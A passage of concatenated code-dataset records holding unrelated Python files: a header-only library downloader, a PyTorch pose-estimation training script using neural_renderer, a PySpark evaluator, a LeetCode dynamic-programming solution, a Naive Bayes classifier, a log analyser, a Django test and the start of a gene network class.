\"https://github.com/CGAL/cgal/releases/download/releases%2FCGAL-5.0.2/CGAL-5.0.2-library.zip\"\n \\param tmp_folder - a termporary folder that can be used to store intermediate products of the downloading process. Should be either non existent or empty.\n \\param extern_folder - folder in which the libraries are stored in, e.g. \"extern\"\n \\param verbose - additional information are printed in output\n '''\n\n path = extern_folder + \"/\" + target_folder\n if os.path.exists(path):\n if debug_output:\n print(target_folder + \" already exists. Skipping...\")\n else:\n if not os.path.exists(tmp_folder):\n os.mkdir(tmp_folder)\n with system_helper.cd(tmp_folder):\n if verbose:\n print (target_folder + \" not found, downloading...\")\n\n # download the file and put it in the current folder \n try:\n r = requests.get(download_link)\n with open(zip_file, 'wb') as outfile:\n outfile.write(r.content)\n except Exception as e:\n print (e)\n print (\"Download unavailable at \" + download_link + \". Aborting...\")\n return\n \n if debug_output:\n print (\"Downloading complete.\")\n \n with zipfile.ZipFile(zip_file, 'r') as zip_ref:\n zip_ref.extractall()\n os.remove(zip_file)\n \n os.makedirs(\"../extern/\" + target_folder, exist_ok=True)\n system_helper.copytree(include_folder, \"../extern/\" + target_folder)\n if debug_output:\n print(\"Successfully downloaded and installed \" + target_folder)\n\ndef download_headers_only(header_only_descriptions, extern_folder = \"extern\", verbose = True):\n '''\n Downloads a header only library as zip file and extracts the relevant include folder in the extern/ folder.\n \\param header_only_descriptions - list of HeaderOnlyDescriptions that \n are used to download the header only libraries.\n \\param extern_folder - folder in which the libraries are stored in, e.g. \"extern\"\n \\param verbose - additional information are printed in output\n '''\n\n # create a tmp folder that doesn't exist yet. Simply appends _\n tmp_folder = \"_tmp\"\n while os.path.exists(tmp_folder):\n tmp_folder = \"_\" + tmp_folder\n \n if not os.path.exists(extern_folder):\n os.mkdir(extern_folder)\n \n for d in header_only_descriptions:\n download_header_only(d.target_folder, d.include_folder, d.zip_file, d.download_link, tmp_folder, extern_folder, verbose)\n\n if os.path.isdir(tmp_folder):\n shutil.rmtree(tmp_folder)\n ","sub_path":"scripts/python/download_header_only.py","file_name":"download_header_only.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"394992185","text":"\"\"\"\nRenderer estimator for the converge of 1 image\ntool has rotation motion\nResnet outputs 3 parameters\n\"\"\"\nimport os\nimport argparse\nimport glob\nfrom torch.utils.data import Dataset\nfrom scipy.spatial.transform.rotation import Rotation as Rot\nimport torch\nimport math as m\nimport torch.nn as nn\nimport numpy as np\nfrom skimage.io import imread, imsave\nimport tqdm\nimport imageio\nimport time\nfrom torch.autograd import Variable\nimport torch\nimport torchvision.models as models\nfrom torchvision.models.resnet import ResNet, Bottleneck\nimport torchvision.models as models\nimport torchgeometry as tgm #from https://torchgeometry.readthedocs.io/en/v0.1.2/_modules/torchgeometry/core/homography_warper.html\nfrom torch.utils.data import DataLoader\nfrom torchvision.transforms import ToTensor, Compose, Normalize, Lambda\nimport matplotlib.pyplot as plt\nimport math as m\nimport torch.utils.model_zoo as model_zoo\nimport neural_renderer as nr\nfrom scipy.misc import imsave\nimport matplotlib2tikz\n\n\ncurrent_dir = os.path.dirname(os.path.realpath(__file__))\ndata_dir = os.path.join(current_dir, '3D_objects')\nresult_dir = os.path.join(current_dir, 'results/2_rotation_render')\n\n\n__all__ = ['ResNet', 'resnet18', 'resnet34', 'resnet50', 'resnet101',\n 'resnet152']\n\nmodel_urls = {\n 'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',\n 'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',\n 'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',\n 'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',\n 'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',\n}\n\nclass CubeDataset(Dataset):\n # code to shape data for the dataloader\n def __init__(self, images, silhouettes, parameters, transform=None):\n self.images = images.astype(np.uint8) # our image\n self.silhouettes = silhouettes.astype(np.uint8) # our related parameter\n self.parameters = parameters.astype(np.float32)\n self.transform = transform\n\n def __getitem__(self, index):\n # Anything could go here, e.g. image loading from file or a different structure\n # must return image and center\n sel_images = self.images[index].astype(np.float32) / 255\n sel_sils = self.silhouettes[index]\n sel_params = self.parameters[index]\n\n if self.transform is not None:\n sel_images = self.transform(sel_images)\n sel_sils = torch.from_numpy(sel_sils)\n\n # squeeze transform sil from tensor shape [6,1,512,512] to shape [6, 512, 512]\n return sel_images, np.squeeze(sel_sils), torch.FloatTensor(sel_params) # return all parameter in tensor form\n\n def __len__(self):\n return len(self.images) # return the length of the dataset\n\ndef Myresnet50(filename_obj=None, pretrained=True, cifar = True, modelName='None', **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ModelResNet50( filename_obj=filename_obj)\n if pretrained:\n print('using own pre-trained model')\n\n if cifar == True:\n pretrained_state = model_zoo.load_url(model_urls['resnet50'])\n model_state = model.state_dict()\n pretrained_state = {k: v for k, v in pretrained_state.items() if\n k in model_state and v.size() == model_state[k].size()}\n model_state.update(pretrained_state)\n model.load_state_dict(model_state)\n model.eval()\n\n else:\n model.load_state_dict(torch.load('models/{}.pth'.format(modelName)))\n model.eval()\n print('download finished')\n return model\n\n\nclass ModelResNet50(ResNet):\n def __init__(self, filename_obj=None, filename_init=None, *args, **kwargs):\n super(ModelResNet50, self).__init__(Bottleneck, [3, 4, 6, 3], num_classes=3, **kwargs)\n\n# resnet part\n self.seq1 = nn.Sequential(\n self.conv1,\n self.bn1,\n self.relu,\n self.maxpool,\n\n self.layer1,\n self.layer2\n )\n\n self.seq2 = nn.Sequential(\n self.layer3,\n self.layer4,\n self.avgpool,\n )\n\n self.fc\n\n# render part\n\n vertices, faces, textures = nr.load_obj(filename_obj, load_texture=True)\n vertices = vertices[None, :, :] # [num_vertices, XYZ] -> [batch_size=1, num_vertices, XYZ]\n faces = faces[None, :, :] # [num_faces, 3] -> [batch_size=1, num_faces, 3\n textures = textures[None, :, :]\n\n self.register_buffer('vertices', vertices)\n self.register_buffer('faces', faces)\n self.register_buffer('textures', textures)\n\n # ---------------------------------------------------------------------------------\n # extrinsic parameter, link world/object coordinate to camera coordinate\n # ---------------------------------------------------------------------------------\n\n alpha = np.radians(0)\n beta = np.radians(0)\n gamma = np.radians(0)\n\n x = 0 # uniform(-2, 2)\n y = 0 # uniform(-2, 2)\n z = 6 # uniform(5, 10) #1000t was done with value between 7 and 10, Rot and trans between 5 10\n\n resolutionX = 512 # in pixel\n resolutionY = 512\n scale = 1\n f = 35 # focal on lens\n sensor_width = 32 # in mm given in blender , camera sensor type\n pixels_in_u_per_mm = (resolutionX * scale) / sensor_width\n pixels_in_v_per_mm = (resolutionY * scale) / sensor_width\n pix_sizeX = 1 / pixels_in_u_per_mm\n pix_sizeY = 1 / pixels_in_v_per_mm\n\n Cam_centerX = resolutionX / 2\n Cam_centerY = resolutionY / 2\n\n batch = vertices.shape[0]\n\n Rx = np.array([[1, 0, 0],\n [0, m.cos(alpha), -m.sin(alpha)],\n [0, m.sin(alpha), m.cos(alpha)]])\n\n Ry = np.array([[m.cos(beta), 0, m.sin(beta)],\n [0, 1, 0],\n [-m.sin(beta), 0, m.cos(beta)]])\n\n Rz = np.array([[m.cos(gamma), -m.sin(gamma), 0],\n [m.sin(gamma), m.cos(gamma), 0],\n [0, 0, 1]])\n\n # creaete the rotation camera matrix\n\n Rzy = np.matmul(Rz, Ry)\n Rzyx = np.matmul(Rzy, Rx)\n R = Rzyx\n\n t = np.array([x, y, z]) # camera position [x,y, z] 0 0 5\n\n # ---------------------------------------------------------------------------------\n # intrinsic parameter, link camera coordinate to image plane\n # ---------------------------------------------------------------------------------\n\n K = np.array([[f / pix_sizeX, 0, Cam_centerX],\n [0, f / pix_sizeY, Cam_centerY],\n [0, 0, 1]]) # shape of [nb_vertice, 3, 3]\n\n K = np.repeat(K[np.newaxis, :, :], batch, axis=0) # shape of [batch=1, 3, 3]\n R = np.repeat(R[np.newaxis, :, :], batch, axis=0) # shape of [batch=1, 3, 3]\n t = np.repeat(t[np.newaxis, :], 1, axis=0) # shape of [1, 3]\n\n self.K = K\n # self.R = nn.Parameter(torch.from_numpy(np.array(R, dtype=np.float32)))\n self.R = R\n # self.Rx\n # self.Ry\n # self.Rz\n # quaternion notation?\n # -------------------------- working block translation\n self.tx = torch.from_numpy(np.array(x, dtype=np.float32)).cuda()\n self.ty = torch.from_numpy(np.array(y, dtype=np.float32)).cuda()\n self.tz = torch.from_numpy(np.array(z, dtype=np.float32)).cuda()\n self.t =torch.from_numpy(np.array([self.tx, self.ty, self.tz], dtype=np.float32)).unsqueeze(0)\n # self.t = nn.Parameter(torch.from_numpy(np.array([self.tx, self.ty, self.tz], dtype=np.float32)).unsqueeze(0))\n\n # --------------------------\n\n # setup renderer\n renderer = nr.Renderer(camera_mode='projection', orig_size=512, K=K, R=self.R, t=self.t, image_size=512, near=1,\n far=1000,\n light_intensity_ambient=1, light_intensity_directional=0, background_color=[0, 0, 0],\n light_color_ambient=[1, 1, 1], light_color_directional=[1, 1, 1],\n light_direction=[0, 1, 0])\n\n self.renderer = renderer\n\n def forward(self, x):\n x = self.seq1(x)\n x = self.seq2(x)\n params = self.fc(x.view(x.size(0), -1))\n print('computed parameters are {}'.format(params))\n return params\n\n# ---------------------------------------------------------------------------------\n# make Gif\n# ---------------------------------------------------------------------------------\ndef make_gif(filename):\n with imageio.get_writer(filename, mode='I') as writer:\n for filename in sorted(glob.glob('/tmp/_tmp_*.png')):\n writer.append_data(imread(filename))\n os.remove(filename)\n writer.close()\n\ndef R2Rmat(R, n_comps=1):\n #function use to make the angle into matrix for the projection function of the renderer\n\n # R[0] = 1.0472\n # R[1] = 0\n # R[2] = 0.698132\n alpha = R[0,0] #already in radian\n beta = R[0,1]\n gamma = R[0,2]\n\n rot_x = Variable(torch.zeros(n_comps, 3, 3).cuda(), requires_grad=False)\n rot_y = Variable(torch.zeros(n_comps, 3, 3).cuda(), requires_grad=False)\n rot_z = Variable(torch.zeros(n_comps, 3, 3).cuda(), requires_grad=False)\n rot_x[:, 0, 0] = 1\n rot_x[:, 0, 1] = 0\n rot_x[:, 0, 2] = 0\n rot_x[:, 1, 0] = 0\n rot_x[:, 1, 1] = alpha.cos()\n rot_x[:, 1, 2] = -alpha.sin()\n rot_x[:, 2, 0] = 0\n rot_x[:, 2, 1] = alpha.sin()\n rot_x[:, 2, 2] = alpha.cos()\n\n rot_y[:, 0, 0] = beta .cos()\n rot_y[:, 0, 1] = 0\n rot_y[:, 0, 2] = beta .sin()\n rot_y[:, 1, 0] = 0\n rot_y[:, 1, 1] = 1\n rot_y[:, 1, 2] = 0\n rot_y[:, 2, 0] = -beta .sin()\n rot_y[:, 2, 1] = 0\n rot_y[:, 2, 2] = beta.cos()\n\n rot_z[:, 0, 0] = gamma.cos()\n rot_z[:, 0, 1] = -gamma.sin()\n rot_z[:, 0, 2] = 0\n rot_z[:, 1, 0] = gamma.sin()\n rot_z[:, 1, 1] = gamma.cos()\n rot_z[:, 1, 2] = 0\n rot_z[:, 2, 0] = 0\n rot_z[:, 2, 1] = 0\n rot_z[:, 2, 2] = 1\n\n\n R = torch.bmm(rot_z, torch.bmm(rot_y, rot_x))\n # print(R)\n # cp_rotMat = (R) # cp_rotMat = (model.R).detach().cpu().numpy()\n # r = Rot.from_dcm(cp_rotMat.detach().cpu().numpy())\n # r_euler = r.as_euler('xyz', degrees=True)\n # print('reuler: {}'.format(r_euler))\n return R\n\n# ---------------------------------------------------------------------------------\n# Main\n# ---------------------------------------------------------------------------------\ndef main():\n\n # ---------- LOAD DATASET AND FILE SELECTION ----------------------------------------------------------------------\n start = time.time()\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n torch.cuda.empty_cache()\n print(device)\n\n file_name_extension = 'Rotation_centered_im4'\n\n\n cubes_file = 'Npydatabase/wrist_{}.npy'.format(file_name_extension)\n silhouettes_file = 'Npydatabase/sils_{}.npy'.format(file_name_extension)\n parameters_file = 'Npydatabase/params_{}.npy'.format(file_name_extension)\n\n wrist = np.load(cubes_file)\n sils = np.load(silhouettes_file)\n params = np.load(parameters_file)\n\n train_im = wrist # 90% training\n train_sil = sils\n train_param = params\n\n normalize = Normalize(mean=[0.5], std=[0.5])\n transforms = Compose([ToTensor(), normalize])\n train_dataset = CubeDataset(train_im, train_sil, train_param, transforms)\n\n\n train_dataloader = DataLoader(train_dataset, batch_size=1, shuffle=True, num_workers=1)\n\n # # check to iterate inside the test dataloader\n # for image, sil, param in train_dataloader:\n #\n # # print(image[2])\n # print(image.size(), param.size()) #torch.Size([batch, 3, 512, 512]) torch.Size([batch, 6])\n # im =0\n # print(param[im]) # parameter in form tensor([2.5508, 0.0000, 0.0000, 0.0000, 0.0000, 5.0000])\n #\n # image2show = image[im] # indexing random one image\n # print(image2show.size()) #torch.Size([3, 512, 512])\n # plt.imshow((image2show * 0.5 + 0.5).numpy().transpose(1, 2, 0))\n # plt.show()\n # break # break here just to show 1 batch of data\n\n count = 0\n losses = []\n a = []\n b = []\n c = []\n tx = []\n ty = []\n tz = []\n isRegression = []\n #ground value to be plotted on the graph as line\n alpha_GT = np.array( m.degrees(params[0,0]))\n beta_GT = np.array(m.degrees(params[0,1]))\n gamma_GT = np.array(m.degrees(params[0,2]))#angle in degrer\n tx_GT = np.array(params[0,3])\n ty_GT = np.array(params[0,4])\n tz_GT = np.array(params[0,5])\n\n iterations = 200\n\n\n # ---------- MODEL CREATION ----------------------------------------------------------------------\n parser = argparse.ArgumentParser()\n parser.add_argument('-io', '--filename_obj', type=str, default=os.path.join(data_dir, 'wrist.obj'))\n parser.add_argument('-or', '--filename_output', type=str, default=os.path.join(result_dir, '{}_render_animation.gif'.format(file_name_extension)))\n parser.add_argument('-mr', '--make_reference_image', type=int, default=0)\n parser.add_argument('-g', '--gpu', type=int, default=0)\n args = parser.parse_args()\n\n # resnet50 = models.resnet50(pretrained=True)\n\n model = Myresnet50(filename_obj=args.filename_obj)\n # model = Model(args.filename_obj, args.filename_ref)\n\n model.to(device)\n\n model.train(True)\n bool_first = True\n Lr_start = 0.00001\n decreaseat = 40\n lr = Lr_start\n loop = tqdm.tqdm(range(iterations))\n for i in loop:\n\n for image, silhouette, parameter in train_dataloader:\n image = image.to(device)\n imgGT = image\n parameter = parameter.to(device)\n init_params = parameter\n\n silhouette = silhouette.to(device)\n\n params = model(image)\n print('computed parameters are {}'.format(params))\n R = params\n model.R = R2Rmat(R).to(device) #angle from resnet are in radian\n model.t = (model.t).to(device)\n image = model.renderer(model.vertices, model.faces, R=model.R, t=model.t, mode='silhouettes')\n current_GT_sil = (silhouette / 255).type(torch.FloatTensor).to(device)\n # regression between computed and ground truth\n\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n loss = nn.BCELoss()(image, current_GT_sil)\n if (i % decreaseat == 0 and i > 2):\n if (lr > 0.00001):\n lr = lr / 10\n print('update lr, is now {}'.format(lr))\n\n print('loss is {}'.format(loss))\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n losses.append(loss.detach().cpu().numpy())\n # print(((model.K).detach().cpu().numpy()))\n cp_x = ((model.t).detach().cpu().numpy())[0,0]\n cp_y = ((model.t).detach().cpu().numpy())[0,1]\n cp_z = ((model.t).detach().cpu().numpy())[0,2]\n\n\n cp_rotMat = (model.R) #cp_rotMat = (model.R).detach().cpu().numpy()\n r = Rot.from_dcm(cp_rotMat.detach().cpu().numpy())\n r_euler = r.as_euler('xyz', degrees=True)\n\n\n a.append(r_euler[0, 0]) # a.append(abs(r_euler[0,0] ))\n b.append(r_euler[0, 1])\n c.append(r_euler[0, 2])\n cp_a = r_euler[0, 0]\n cp_b = r_euler[0, 1]\n cp_c = r_euler[0, 2]\n\n\n tx.append(cp_x)\n ty.append(cp_y)\n tz.append(cp_z) #z axis value\n\n images, _, _ = model.renderer(model.vertices, model.faces, torch.tanh(model.textures), R = model.R, t= model.t )\n\n img = images.detach().cpu().numpy()[0].transpose(1,2,0)\n\n if(i == iterations-1):\n\n imgGT = imgGT.squeeze() # float32 from 0-1\n imgGT = imgGT.detach().cpu()\n imgGT = (imgGT * 0.5 + 0.5).numpy().transpose(1, 2, 0)\n # imgGT = (imgGT * 255).astype(np.uint8) # cast from float32 255.0 to 255 uint8\n\n f = plt.subplot(1, 2, 1)\n plt.imshow(imgGT)\n f.set_title('Ground truth \\n alpha {:.3f}° tx {}\\n'\n 'beta {:.3f}° ty {}\\n '\n 'gamma {:.3f}° tz {}'.format(alpha_GT,tx_GT, beta_GT,ty_GT,gamma_GT, tz_GT))\n plt.xticks([0, 512])\n plt.yticks([])\n f = plt.subplot(1, 2,2)\n plt.imshow(img)\n f.set_title('Renderer \\n alpha {:.3f}° tx {:.3f}\\n'\n 'beta {:.3f}° ty {:.3f}\\n'\n 'gamma {:.3f}° tz {:.3f}'.format(cp_a, cp_x,cp_b, cp_y,cp_c, cp_z))\n plt.xticks([0, 512])\n plt.yticks([])\n\n plt.savefig('results/2_rotation_render/Final_render_rotation_{}iterations_{}.png'.format(iterations, file_name_extension), bbox_inches = 'tight', pad_inches = 0.05)\n\n\n imsave('/tmp/_tmp_%04d.png' % i, img)\n loop.set_description('Optimizing (loss %.4f)' % loss.data)\n count = count +1\n\n\n end = time.time()\n exectime = round((end - start), 2) #format in minute\n print('time elapsed is: {} sec'.format(exectime))\n\n # ----------PLOT SECTION ------------------------------------------------------------------------\n make_gif(args.filename_output)\n fig, (p1, p3) = plt.subplots(2, figsize=(15,10)) #largeur hauteur\n fig.suptitle(\"Render for 1 image, {} epochs in {} sec, rotation only, 3 parameters \\n lr={} and decrease each {} iterations\".format(iterations,exectime, Lr_start, decreaseat), fontsize=14)\n\n p1.plot(np.arange(count), losses, label=\"Global Loss\")\n p1.set( ylabel='BCE Loss')\n p1.set_yscale('log')\n p1.set_ylim([0, 1])\n p1.set(xlabel='Iterations')\n # Place a legend to the right of this smaller subplot.\n p1.legend()\n\n p3.plot(np.arange(count), a, label=\"alpha values\", color = 'g')\n p3.axhline(y=alpha_GT, color = 'g', linestyle= '--' )\n p3.plot(np.arange(count), b, label=\"beta values\", color = 'y')\n p3.axhline(y=beta_GT, color = 'y', linestyle= '--')\n p3.plot(np.arange(count), c, label=\"gamma values\", color = 'b')\n p3.axhline(y=gamma_GT, color = 'b', linestyle= '--' )\n\n p3.set(xlabel='iterations', ylabel='Rotation value')\n p3.set_ylim([-180, 180])\n p3.legend()\n\n fig.savefig('results/2_rotation_render/render_1image_Translation_3params_{}.pdf'.format(file_name_extension), bbox_inches = 'tight', pad_inches = 0.05)\n fig.savefig('results/2_rotation_render/render_1image_Translation_3params_{}.png'.format(file_name_extension), bbox_inches = 'tight', pad_inches = 0.05)\n matplotlib2tikz.save(\"results/2_rotation_render/render_1image_Translation_3params_{}.tex\".format(file_name_extension),figureheight='5.5cm', figurewidth='15cm')\n plt.show()\n\nif __name__ == '__main__':\n main()","sub_path":"training1image/2_example5_resnet_1im_rotation_Render_3params.py","file_name":"2_example5_resnet_1im_rotation_Render_3params.py","file_ext":"py","file_size_in_byte":19136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"393140861","text":"from pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator\n\n\ndef evaluate_binary_classifier(predictions):\n PR_evaluator = \\\n BinaryClassificationEvaluator(labelCol=\"label\",\n rawPredictionCol=\"rawPrediction\",\n metricName=\"areaUnderPR\")\n area_under_PR = PR_evaluator.evaluate(predictions)\n f1_evaluator = \\\n MulticlassClassificationEvaluator(predictionCol='prediction',\n labelCol='label',\n metricName='f1')\n f1_score = f1_evaluator.evaluate(predictions)\n ROC_evaluator = \\\n BinaryClassificationEvaluator(labelCol=\"label\",\n rawPredictionCol=\"rawPrediction\",\n metricName=\"areaUnderROC\")\n area_under_ROC = ROC_evaluator.evaluate(predictions)\n acc_evaluator = \\\n MulticlassClassificationEvaluator(predictionCol='prediction',\n labelCol='label',\n metricName='accuracy')\n acc_score = acc_evaluator.evaluate(predictions)\n\n print(f\"Area Under PR = {area_under_PR}\")\n print(f\"F1 score = {f1_score}\")\n print(f\"Area Under ROC = {area_under_ROC}\")\n print(f\"Accuracy = {acc_score}\")\n\n return (area_under_PR, f1_score, area_under_ROC, acc_score)\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"470543666","text":"#!/usr/bin/python\n\"\"\"\nGiven a 2d binary matrix filled with 0's and 1's, find the largest square containing only 1's and return its area.\nleetcode #221. This particular solution takes in array of string, which is for the submission\non leetcode.\n\"\"\"\n\ndef maximal_square_dp_better_space(mtx):\n \"\"\"\n Solving the problem using dynamic programming with O(mn) speed and O(n) space.\n \"\"\"\n w = len(mtx[0])\n h = len(mtx)\n\n rslt = [0]*(w+1)\n\n maxsqlen = 0\n prev = 0\n for i in xrange(1, h+1):\n for j in xrange(1, w+1):\n tmp = rslt[j]\n if mtx[i-1][j-1] == '1':\n rslt[j] = min(rslt[j-1], rslt[j], prev) + 1\n maxsqlen = max(maxsqlen, rslt[j])\n else:\n rslt[j] = 0\n prev = tmp\n\n return maxsqlen*maxsqlen\n\ndef test1():\n mtx = ['10100', \\\n '10111', \\\n '11111', \\\n '10010']\n\n print(maximal_square_dp_better_space(mtx))\n\ndef test2():\n mtx = ['1111', \\\n '1111', \\\n '1100', \\\n '1101']\n\n print(maximal_square_dp_better_space(mtx))\n\ndef test3():\n mtx = ['1101', \\\n '0001', \\\n '0000', \\\n '0001']\n\n print(maximal_square_dp_better_space(mtx))\n\ndef test4():\n mtx = ['01110', \\\n '11110', \\\n '01111', \\\n '01111', \\\n '00111']\n\n print(maximal_square_dp_better_space(mtx))\n\nif __name__ == '__main__':\n test1()\n print('------')\n test4()\n# test2()\n# print('------')\n# test3()\n# print('------')\n# test4()\n","sub_path":"dynamicProgramming/maximalSquareStrInput.py","file_name":"maximalSquareStrInput.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"290490278","text":"#Implementation of Naive Bayes classifier.\n\n#Jenna Bellassai\n#28 October 2016\n\nimport sys\nimport csv\nimport random\nimport math\nimport collections\nimport copy\n\nPOSSIBLE_ATT_VALS = dict()\natts_list = []\nlabel_list = []\n\nclass Instance:\n def __init__(self,label,atts):\n self.label = label\n self.atts = atts\n\n'''construct list of instances from csv file'''\ndef get_instances(file):\n first_row = True\n all_instances = []\n with open(file, 'r') as csvfile:\n reader = csv.reader(csvfile)\n for row in reader:\n atts = collections.OrderedDict()\n if first_row==True:\n label_name = row[0]\n for i in range(1, len(row)):\n atts_list.append(row[i]) #set general attribute names\n POSSIBLE_ATT_VALS[row[i]] = []\n first_row = False\n else:\n label = row[0] #store label for this instance\n if label not in label_list:\n label_list.append(label)\n for i in range(1, len(row)):\n atts[atts_list[i-1]] = row[i]\n if (row[i]) not in POSSIBLE_ATT_VALS[atts_list[i-1]]:\n if (row[i]) != '?':\n POSSIBLE_ATT_VALS[atts_list[i-1]].append(row[i])\n instance = Instance(label, atts)\n all_instances.append(instance)\n return(all_instances,label_name)\n\n'''split instances into training and test sets using random seed'''\ndef split_instances(all_instances, seed):\n seed = random.seed(seed)\n random.shuffle(all_instances) #shuffled list of instances\n train_size = int(round(0.6 * len(all_instances)))\n test_size = len(all_instances) - train_size\n train_set = []\n test_set = []\n for i in range(0, train_size):\n train_set.append(all_instances[i])\n for i in range(train_size, len(all_instances)):\n test_set.append(all_instances[i])\n return (train_set, test_set)\n\n'''train model on training set'''\ndef naive_bayes_train(train_set):\n train_label_dict = dict()\n '''build dictionary of every possible label in the training set'''\n for instance in train_set: \n if instance.label not in train_label_dict:\n train_label_dict[instance.label] = 1\n else:\n train_label_dict[instance.label] += 1 \n \n '''create 2D dictionary structure for storing counts''' \n label_tables = collections.OrderedDict()\n for label in train_label_dict.keys():\n label_tables[label] = collections.OrderedDict()\n for attribute in atts_list:\n label_tables[label][attribute] = collections.OrderedDict()\n \n '''fill dictionary structure with counts'''\n for label in train_label_dict.keys(): #for every observed label\n for instance in train_set: #for each instance\n if instance.label==label:\n for att_val in instance.atts.items(): #for each attribute value\n attribute = att_val[0]\n value = att_val[1]\n if value not in label_tables[label][attribute].keys(): #if this att value is not in the attribute dict yet\n label_tables[label][attribute][value] = 1\n else:\n label_tables[label][attribute][value] += 1\n '''calculate probabilities using structure of counts''' \n prob_tables = copy.deepcopy(label_tables)\n a = 1\n for label in label_tables.keys():\n for attribute in label_tables[label].keys():\n for value in label_tables[label][attribute].keys():\n numerator = a + label_tables[label][attribute][value]\n b = len(POSSIBLE_ATT_VALS[attribute])\n denominator = b + train_label_dict[label]\n prob_tables[label][attribute][value] = numerator / denominator\n return prob_tables, train_label_dict\n\n'''use trained model to make predictions on test set''' \ndef naive_bayes_predict(instance, train_set, prob_tables, train_label_dict):\n label_scores = dict()\n for label in train_label_dict.keys(): #make calcuations for every possible label\n p_l = train_label_dict[label] / len(train_set) #prior probability\n '''apply Bayes's rule'''\n p_instance = 1\n for att_val in instance.atts.items(): #for each of the instance's attribute values\n attribute = att_val[0]\n value = att_val[1]\n if value not in prob_tables[label][attribute].keys(): #if this attribute value didn't appear in the training set\n curr_p = 1 / len(POSSIBLE_ATT_VALS[attribute]) #pseudo counts case\n else:\n curr_p = prob_tables[label][attribute][value] #retrieve prob of current label given current attribute and its value\n p_instance = p_instance * curr_p\n sum = math.log(p_l) + math.log(p_instance) #log transformation to avoid underfitting\n label_score = math.exp(sum)\n label_scores[label] = label_score\n curr_max = 0\n curr_label = None\n for item in label_scores.items(): #for every label score\n if item[1] > curr_max: #if label's score is greatest so far\n curr_max = item[1] #store this label as highest performing label\n curr_label = item[0]\n return curr_label\n \n \n\nif __name__ == '__main__':\n all_instances, label_name = get_instances(sys.argv[1])\n seed = sys.argv[2]\n train_set, test_set = split_instances(all_instances, seed)\n probs, train_label_dict = naive_bayes_train(train_set)\n \n '''build confusion matrix''' \n predict_list=[]\n actual_list = []\n for instance in all_instances:\n if instance.label not in predict_list:\n predict_list.append(instance.label)\n if instance.label not in actual_list:\n actual_list.append(instance.label)\n matrix = [[0]*len(predict_list) for i in range(len(predict_list))]\n correct = 0\n total = 0\n for instance in test_set:\n prediction = naive_bayes_predict(instance,train_set,probs,train_label_dict)\n if prediction==instance.label:\n correct += 1\n total += 1\n else:\n total += 1\n for i in range(len(predict_list)):\n if predict_list[i]==prediction:\n for j in range(len(actual_list)):\n if actual_list[j]==instance.label:\n matrix[i][j] += 1\n \n \n '''output confusion matrix to csv'''\n file_name = \"results_\"+sys.argv[1]+\"_NaiveBayes_\"+sys.argv[2]+\".csv\"\n file = open(file_name,'w')\n for label in predict_list:\n file.write(label)\n file.write(\",\")\n file.write('\\n')\n for i in range(len(matrix)):\n for item in matrix[i]:\n file.write(str(item))\n file.write(\",\")\n file.write(predict_list[i])\n file.write('\\n')\n \n ","sub_path":"NBPart1.py","file_name":"NBPart1.py","file_ext":"py","file_size_in_byte":6936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"119962132","text":"import os\n\ndef anaysis_data():\n test_times = []\n # 打开data.log文件\n with open(os.getcwd() + \"/data.log\") as fs:\n for line in fs.readlines(): # 按行读取\n temp = line.strip(\"\\n\").split(\",\") # 去掉换行符之后,再按,分割\n print(\"temp\",temp)\n if temp[-1] == str(0): # 筛选success字段为0的TestTime\n test_times.append(int(temp[-2]))\n\n if len(test_times) > 0:\n avg_time = sum(test_times) / len(test_times) # 平均值\n max_time = max(test_times)\n min_time = min(test_times)\n print(\"最大的TestTime: \",max_time,\",最小的TestTime: \",min_time,\",平均TestTime: \",avg_time)\n\n\nif __name__ == '__main__':\n anaysis_data()","sub_path":"python 25 code/exam2_0302_python_api/exam2-last p.py","file_name":"exam2-last p.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"363218143","text":"from django.test import LiveServerTestCase\n# from selenium import webdriver\n# from xvfbwrapper import Xvfb\nimport requests\n\n\nclass NewVisitorTest(LiveServerTestCase):\n # def setUp(self):\n # self.xvfb = Xvfb(width=1280, height=720)\n # self.xvfb.start()\n # self.browser = webdriver.Chrome()\n\n\n def test_greet_anonymous_entities(self):\n r = requests.get(self.live_server_url)\n self.assertEqual(r.status_code, 200)\n self.assertEqual(r.text, '{\"message\":\"Welcome to the Kyonan Inventory System\"}')\n\n # def tearDown(self):\n # self.browser.quit()\n # self.xvfb.stop()\n\n","sub_path":"server/functional_tests/test_all_users.py","file_name":"test_all_users.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"321127364","text":"from GeneNode import GeneNode\n\nclass Network:\n network = {}\n \n ## build network data structure using edge list csv file\n def __init__(self,fileName=None,split=\"\"):\n self.network = {}\n \n if fileName is not None:\n edge_list = open(fileName,\"r\")\n for l in edge_list:\n #skip header line\n if \"Source\" in l:\n continue\n\n array = l.strip().split(split)\n self.createNode(array)\n \n @staticmethod\n def sequenceToEdgeList(list,fout,network,header=False):\n if header:\n fout.write(\"Edge\\tAttribute\\n\")\n for i in xrange(0,len(list)-1):\n fout.write(list[i]+\" (\"+network.getEdgeType(list[i])+\") 